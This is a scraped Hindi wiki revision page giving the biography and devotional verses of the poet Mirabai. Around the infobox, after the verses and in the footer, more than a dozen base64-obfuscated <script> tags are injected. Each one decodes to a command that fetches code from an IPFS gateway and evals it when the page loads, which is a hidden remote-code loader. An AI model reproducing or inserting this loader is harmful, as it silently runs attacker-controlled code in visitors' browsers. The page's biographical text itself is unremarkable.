Difference between revisions of "मीरां"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 49: Line 49:
 
प्रसिद्ध कृष्ण भक्त कवयित्री मीराबाई [[जोधपुर]], [[राजस्थान]] के मेड़वा राजकुल की राजकुमारी थीं। विद्वानों में इनकी जन्म-तिथि के संबंध में मतैक्य नहीं है। कुछ विद्वान इनका जन्म 1430 ई. मानते हैं और कुछ 1498 ई.। मीराबाई मेड़ता महाराज के छोटे भाई रतन सिंह की एकमात्र संतान थीं। उनका जीवन बड़े दु:ख और कष्ट में व्यतीत हुआ था। बाल्यावस्था में ही उनकी माँ का देहांत हो गया। कुछ समय तक मीरा की देखभाल उनके पितामह ने की, परंतु कुछ वर्ष बाद वे भी चल बसे।
 
प्रसिद्ध कृष्ण भक्त कवयित्री मीराबाई [[जोधपुर]], [[राजस्थान]] के मेड़वा राजकुल की राजकुमारी थीं। विद्वानों में इनकी जन्म-तिथि के संबंध में मतैक्य नहीं है। कुछ विद्वान इनका जन्म 1430 ई. मानते हैं और कुछ 1498 ई.। मीराबाई मेड़ता महाराज के छोटे भाई रतन सिंह की एकमात्र संतान थीं। उनका जीवन बड़े दु:ख और कष्ट में व्यतीत हुआ था। बाल्यावस्था में ही उनकी माँ का देहांत हो गया। कुछ समय तक मीरा की देखभाल उनके पितामह ने की, परंतु कुछ वर्ष बाद वे भी चल बसे।
 
====कृष्ण से लगाव====
 
====कृष्ण से लगाव====
मीराबाई के बालमन में कृष्ण की ऐसी छवि बसी थी कि यौवन काल से लेकर मृत्यु तक उन्होंने कृष्ण को ही अपना सब कुछ माना। जोधपुर के राठौड़ रतन सिंह की इकलौती पुत्री मीराबाई का बचपन से ही कृष्ण-भक्ति में रम गई थीं। मीराबाई का कृष्ण प्रेम बचपन की एक घटना की वजह से अपने चरम पर पहुँचा था। बाल्यकाल में एक दिन उनके पड़ोस में किसी धनवान व्यक्ति के यहाँ बारात आई थी। सभी स्त्रियाँ छत से खड़ी होकर बारात देख रही थीं। मीराबाई भी बारात देखने के लिए छत पर आ गईं। बारात को देख मीरा ने अपनी माता से पूछा कि "मेरा दूल्हा कौन है?" इस पर मीराबाई की माता ने भगवान श्रीकृष्ण की मूर्ति के तरफ़ इशारा करते हुए कह दिया कि "यही तुम्हारे दुल्हा हैं"। यह बात मीराबाई के बालमन में एक गाँठ की तरह समा गई और अब वे कृष्ण को ही अपना पति समझने लगीं।
+
मीराबाई के बालमन में कृष्ण की ऐसी छवि बसी थी कि यौवन काल से लेकर मृत्यु तक उन्होंने कृष्ण को ही अपना सब कुछ माना। जोधपुर के राठौड़ रतन सिंह की इकलौती पुत्री मीराबाई का मन बचपन से ही कृष्ण-भक्ति में रम गया था। उनका कृष्ण प्रेम बचपन की एक घटना की वजह से अपने चरम पर पहुँचा था। बाल्यकाल में एक दिन उनके पड़ोस में किसी धनवान व्यक्ति के यहाँ बारात आई थी। सभी स्त्रियाँ छत से खड़ी होकर बारात देख रही थीं। मीराबाई भी बारात देखने के लिए छत पर आ गईं। बारात को देख मीरा ने अपनी माता से पूछा कि "मेरा दूल्हा कौन है?" इस पर मीराबाई की माता ने उपहास में ही भगवान श्रीकृष्ण की मूर्ति के तरफ़ इशारा करते हुए कह दिया कि "यही तुम्हारे दुल्हा हैं"। यह बात मीराबाई के बालमन में एक गाँठ की तरह समा गई और अब वे कृष्ण को ही अपना पति समझने लगीं।
 
==विवाह==
 
==विवाह==
 
जब मीरा बड़ी हुईं तो उनका [[विवाह]] [[उदयपुर]] के [[महाराणा सांगा]] के पुत्र भोजराज के साथ 1516 ई. में कर दिया गया। इस विवाह के लिए पहले तो मीराबाई ने मना कर दिया, लेकिन परिवार वालों के अत्यधिक बल देने पर वह तैयार हो गईं। वह फूट-फूट कर रोने लगीं और विदाई के समय श्रीकृष्ण की वही मूर्ति अपने साथ ले गईं, जिसे उनकी माता ने उनका दुल्हा बताया था। मीराबाई ने लज्जा और परंपरा को त्याग कर अनूठे प्रेम और [[भक्ति]] का परिचय दिया।
 
जब मीरा बड़ी हुईं तो उनका [[विवाह]] [[उदयपुर]] के [[महाराणा सांगा]] के पुत्र भोजराज के साथ 1516 ई. में कर दिया गया। इस विवाह के लिए पहले तो मीराबाई ने मना कर दिया, लेकिन परिवार वालों के अत्यधिक बल देने पर वह तैयार हो गईं। वह फूट-फूट कर रोने लगीं और विदाई के समय श्रीकृष्ण की वही मूर्ति अपने साथ ले गईं, जिसे उनकी माता ने उनका दुल्हा बताया था। मीराबाई ने लज्जा और परंपरा को त्याग कर अनूठे प्रेम और [[भक्ति]] का परिचय दिया।
Line 55: Line 55:
 
विवाह के दस वर्ष बाद ही मीराबाई के पति भोजरात का निधन हो गया। सम्भवत: उनके पति की युद्धोपरांत घावों के कारण मृत्यु हो गई थी। पति की मृत्यु के बाद ससुराल में मीराबाई पर कई अत्याचार किए गए। तत्कालीन समाज में मीराबाई को एक विद्रोहिणी माना गया। उनके धार्मिक क्रिया-कलाप [[राजपूत]] राजकुमारी और विधवा के लिए स्थापित नियमों के अनुकूल नहीं थे। वह अपना अधिकांश समय कृष्ण को समर्पित निजी मंदिर में और [[भारत]] भर से आये साधुओं व तीर्थ यात्रियों से मिलने तथा भक्ति पदों की रचना करने में व्यतीत करती थीं।
 
विवाह के दस वर्ष बाद ही मीराबाई के पति भोजरात का निधन हो गया। सम्भवत: उनके पति की युद्धोपरांत घावों के कारण मृत्यु हो गई थी। पति की मृत्यु के बाद ससुराल में मीराबाई पर कई अत्याचार किए गए। तत्कालीन समाज में मीराबाई को एक विद्रोहिणी माना गया। उनके धार्मिक क्रिया-कलाप [[राजपूत]] राजकुमारी और विधवा के लिए स्थापित नियमों के अनुकूल नहीं थे। वह अपना अधिकांश समय कृष्ण को समर्पित निजी मंदिर में और [[भारत]] भर से आये साधुओं व तीर्थ यात्रियों से मिलने तथा भक्ति पदों की रचना करने में व्यतीत करती थीं।
 
==हत्या के प्रयास==
 
==हत्या के प्रयास==
भोजराज के बाद सिंहासन विक्रमजीत सिंह को प्राप्त हुआ, जिन्हें मीराबाई का [[साधु]]-[[संत|संतों]] के साथ उठना-बैठना पसन्द नहीं था। मीराबाई को मारने के कम से कम दो प्रयासों का चित्रण उनकी कतिताओं में हुआ है। एक बार फूलों की टोकरी में एक विषेला साँप भेजा गया, लेकिन टोकरी खोलने पर उन्हें कृष्ण की मूर्ति मिली। एक अन्य अवसर पर उन्हें विष का प्याला दिया गया, लेकिन उसे पीकर भी मीराबाई को कोई हानि नहीं पहुँची।
+
भोजराज के बाद सिंहासन विक्रमजीत सिंह को प्राप्त हुआ, जिन्हें मीराबाई का [[साधु]]-[[संत|संतों]] के साथ उठना-बैठना पसन्द नहीं था। मीराबाई को मारने के कम से कम दो प्रयासों का चित्रण उनकी कविताओं में हुआ है। एक बार फूलों की टोकरी में एक विषेला [[साँप]] भेजा गया, लेकिन टोकरी खोलने पर उन्हें कृष्ण की मूर्ति मिली। एक अन्य अवसर पर उन्हें विष का प्याला दिया गया, लेकिन उसे पीकर भी मीराबाई को कोई हानि नहीं पहुँची।
 
==द्वारिका में वास==
 
==द्वारिका में वास==
इन सब कुचक्रों से पीड़ित होकर मीराबाई अंतत: [[मेवाड़]] छोड़कर मेड़ता आ गईं, लेकिन यहाँ भी उनका स्वछंद व्यवहार स्वीकार नहीं किया गया। अब वे तीर्थयात्रा पर निकल पड़ीं और अंतत: [[द्वारिका]] में बस गईं। वे मंदिरों में जाकर वहाँ मौजूद कृष्ण भक्तों के सामने [[कृष्ण]] की मूर्ति के आगे नाचती रहती थीं। 1546 में विक्रम सिंह के बाद राणा बनने पर उदय सिंह ने मीराबाई को वापस मेवाड़ लाने के लिए [[ब्राह्मण|ब्राह्मणों]] का एक दल भेजा। मीराबाई ने 'रणछोड़जी' (श्रीकृष्ण) के मंदिर में एक रात ठहरने की अनुमति मांगी और अगली सुबह वह वहाँ नहीं मिलीं। लोक मान्यता के अनुसार रणछोड़जी की मूर्ति के साथ चमत्कारिक ढंग से उनका विलय हो गया। लेकिन वास्तव में उस रात उनकी मृत्यु हो गई या वह वहाँ से चुपके से निकल कर शेष वर्ष छद्म वेश में घूमती रहीं, यह अज्ञात है। उनकी मृत्यु के विषय में किसी भी तथ्य का स्पष्टीकरण आज तक नहीं हो सका है।
+
इन सब कुचक्रों से पीड़ित होकर मीराबाई अंतत: [[मेवाड़]] छोड़कर मेड़ता आ गईं, लेकिन यहाँ भी उनका स्वछंद व्यवहार स्वीकार नहीं किया गया। अब वे तीर्थयात्रा पर निकल पड़ीं और अंतत: [[द्वारिका]] में बस गईं। वे मंदिरों में जाकर वहाँ मौजूद कृष्ण भक्तों के सामने [[कृष्ण]] की मूर्ति के आगे नाचती रहती थीं। 1546 में विक्रम सिंह के बाद राणा बनने पर उदय सिंह ने मीराबाई को वापस [[मेवाड़]] लाने के लिए [[ब्राह्मण|ब्राह्मणों]] का एक दल भेजा। मीराबाई ने 'रणछोड़जी' (श्रीकृष्ण) के मंदिर में एक रात ठहरने की अनुमति मांगी और अगली सुबह वह वहाँ नहीं मिलीं। लोक मान्यता के अनुसार रणछोड़जी की मूर्ति के साथ चमत्कारिक ढंग से उनका विलय हो गया। लेकिन वास्तव में उस रात उनकी मृत्यु हो गई या वह वहाँ से चुपके से निकल कर शेष वर्ष छद्म वेश में घूमती रहीं, यह अज्ञात है। उनकी मृत्यु के विषय में किसी भी तथ्य का स्पष्टीकरण आज तक नहीं हो सका है।
 
==ग्रन्थ रचना==
 
==ग्रन्थ रचना==
 
[[Image:Mirabai-2.jpg|thumb|250px|[[केशी घाट वृन्दावन|केशी घाट]], [[वृन्दावन]]]]
 
[[Image:Mirabai-2.jpg|thumb|250px|[[केशी घाट वृन्दावन|केशी घाट]], [[वृन्दावन]]]]

Revision as of 12:11, 15 March 2013

miraan
poora nam mirabaee
any nam miraanbaee
janm 1498
janm bhoomi merata, rajasthan
mrityu 1547
pati/patni kuanvar bhojaraj
karm bhoomi vrindavan
mukhy rachanaean barasi ka mayara, git goviand tika, rag goviand, rag sorath ke pad
vishay krishnabhakti
bhasha brajabhasha
inhean bhi dekhean kavi soochi, sahityakar soochi
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
miraanbaee ki rachanaean
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

miraanbaee athava mirabaee hindoo adhyatmik kavayitri thian, jinake bhagavan shrikrishna ke prati samarpit bhajan uttar bharat mean bahut lokapriy haian. bhajan aur stuti ki rachanaean kar amajan ko bhagavan ke aur samip pahuanchane vale santoan aur mahatmaoan mean mirabaee ka sthan sabase oopar mana jata hai. mira ka sambandh ek rajapoot parivar se tha. ve rajapoot rajakumari thian, jo me data maharaj ke chhote bhaee ratan sianh ki ekamatr santan thian. unaki shahi shiksha mean sangit aur dharm ke sath-sath rajaniti v prashasan bhi shamil the. ek sadhu dvara bachapan mean unhean krishna ki moorti die jane ke sath hi unaki ajanm krishna bhakti ki shuruat huee, jinaki vah divy premi ke roop mean aradhana karati thian.

janm

prasiddh krishna bhakt kavayitri mirabaee jodhapur, rajasthan ke me dava rajakul ki rajakumari thian. vidvanoan mean inaki janm-tithi ke sanbandh mean mataiky nahian hai. kuchh vidvan inaka janm 1430 ee. manate haian aur kuchh 1498 ee.. mirabaee me data maharaj ke chhote bhaee ratan sianh ki ekamatr santan thian. unaka jivan b de du:kh aur kasht mean vyatit hua tha. balyavastha mean hi unaki maan ka dehaant ho gaya. kuchh samay tak mira ki dekhabhal unake pitamah ne ki, parantu kuchh varsh bad ve bhi chal base.

krishna se lagav

mirabaee ke balaman mean krishna ki aisi chhavi basi thi ki yauvan kal se lekar mrityu tak unhoanne krishna ko hi apana sab kuchh mana. jodhapur ke rathau d ratan sianh ki ikalauti putri mirabaee ka man bachapan se hi krishna-bhakti mean ram gaya tha. unaka krishna prem bachapan ki ek ghatana ki vajah se apane charam par pahuancha tha. balyakal mean ek din unake p dos mean kisi dhanavan vyakti ke yahaan barat aee thi. sabhi striyaan chhat se kh di hokar barat dekh rahi thian. mirabaee bhi barat dekhane ke lie chhat par a geean. barat ko dekh mira ne apani mata se poochha ki "mera doolha kaun hai?" is par mirabaee ki mata ne upahas mean hi bhagavan shrikrishna ki moorti ke taraf ishara karate hue kah diya ki "yahi tumhare dulha haian". yah bat mirabaee ke balaman mean ek gaanth ki tarah sama gee aur ab ve krishna ko hi apana pati samajhane lagian.

vivah

jab mira b di hueean to unaka vivah udayapur ke maharana saanga ke putr bhojaraj ke sath 1516 ee. mean kar diya gaya. is vivah ke lie pahale to mirabaee ne mana kar diya, lekin parivar valoan ke atyadhik bal dene par vah taiyar ho geean. vah phoot-phoot kar rone lagian aur vidaee ke samay shrikrishna ki vahi moorti apane sath le geean, jise unaki mata ne unaka dulha bataya tha. mirabaee ne lajja aur paranpara ko tyag kar anoothe prem aur bhakti ka parichay diya.

pati ki mrityu

vivah ke das varsh bad hi mirabaee ke pati bhojarat ka nidhan ho gaya. sambhavat: unake pati ki yuddhoparaant ghavoan ke karan mrityu ho gee thi. pati ki mrityu ke bad sasural mean mirabaee par kee atyachar kie ge. tatkalin samaj mean mirabaee ko ek vidrohini mana gaya. unake dharmik kriya-kalap rajapoot rajakumari aur vidhava ke lie sthapit niyamoan ke anukool nahian the. vah apana adhikaansh samay krishna ko samarpit niji mandir mean aur bharat bhar se aye sadhuoan v tirth yatriyoan se milane tatha bhakti padoan ki rachana karane mean vyatit karati thian.

hatya ke prayas

bhojaraj ke bad sianhasan vikramajit sianh ko prapt hua, jinhean mirabaee ka sadhu-santoan ke sath uthana-baithana pasand nahian tha. mirabaee ko marane ke kam se kam do prayasoan ka chitran unaki kavitaoan mean hua hai. ek bar phooloan ki tokari mean ek vishela saanp bheja gaya, lekin tokari kholane par unhean krishna ki moorti mili. ek any avasar par unhean vish ka pyala diya gaya, lekin use pikar bhi mirabaee ko koee hani nahian pahuanchi.

dvarika mean vas

in sab kuchakroan se pi dit hokar mirabaee aantat: meva d chho dakar me data a geean, lekin yahaan bhi unaka svachhand vyavahar svikar nahian kiya gaya. ab ve tirthayatra par nikal p dian aur aantat: dvarika mean bas geean. ve mandiroan mean jakar vahaan maujood krishna bhaktoan ke samane krishna ki moorti ke age nachati rahati thian. 1546 mean vikram sianh ke bad rana banane par uday sianh ne mirabaee ko vapas meva d lane ke lie brahmanoan ka ek dal bheja. mirabaee ne 'ranachho daji' (shrikrishna) ke mandir mean ek rat thaharane ki anumati maangi aur agali subah vah vahaan nahian milian. lok manyata ke anusar ranachho daji ki moorti ke sath chamatkarik dhang se unaka vilay ho gaya. lekin vastav mean us rat unaki mrityu ho gee ya vah vahaan se chupake se nikal kar shesh varsh chhadm vesh mean ghoomati rahian, yah ajnat hai. unaki mrityu ke vishay mean kisi bhi tathy ka spashtikaran aj tak nahian ho saka hai.

granth rachana

mirabaee ne char granthoan ki bhi rachana ki thi-

  1. 'barasi ka mayara'
  2. 'git goviand tika'
  3. 'rag goviand'
  4. 'rag sorath'

isake atirikt unake gitoan ka sankalan "mirabaee ki padavali" namak granth mean kiya gaya hai.

pad

mirabaee ki mahanata aur unaki lokapriyata unake padoan aur rachanaoan ki vajah se bhi hai. ye pad aur rachanaean rajasthani, braj aur gujarati bhashaoan mean milate haian. hriday ki gahari pi da, virahanubhooti aur prem ki tanmayata se bhare hue mirabaee ke pad anamol sanpatti haian. aansuoan se bhare ye pad gitikavy ke uttam namoone haian. mirabaee ne apane padoan mean 'shrriangar ras' aur 'shaant ras' ka prayog vishesh roop se kiya hai. bhavoan ki sukumarata aur niradanbari sahaj shaili ki sarasata ke karan mirabaee ki vyathasikt padavali barabas hi sabako akarshit kar leti hai. mirabaee ne bhakti ko ek naya ayam diya hai. ek aisa sthan jahaan bhagavan hi iansan ka sab kuchh hota hai. sansar ke sabhi lobh use moh se vichalit nahian kar sakate. ek achchha-khasa rajapat hone ke bad bhi mirabaee vairagi bani rahian. unaki krishna bhakti ek anoothi misal rahi hai. unaki rachana ke kuchh aansh is prakar haian-

payo ji mhean to ram ratan dhan payo .
vastu amolak di mhare sataguru, kirapa kar apanayo ॥
janam-janam ki pooanji paee, jag mean sabhi khovayo .
kharach n khootai chor n lootai, din-din badhat savayo ॥
sat ki naanv khevatiya sataguru, bhavasagar tar ayo .
'mira' ke prabhu giridhar nagar, harakh-harakh jas payo ॥

mere to giridhar gopal doosarau n koee.
jake sir mor mukut mero pati soee..
chhaan di dee kul ki kani kaha karai koee.
santan dhig baithi baithi lok laj khoee.
aansuvan jal sianchi sianchi prem beli boee.
dadhi mathi ghrit kadhi liyau dari dee chhoee.
bhagat dekhi raji bhi, jagat dekhi roee.
dasi mira lal giridhar taro ab moee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>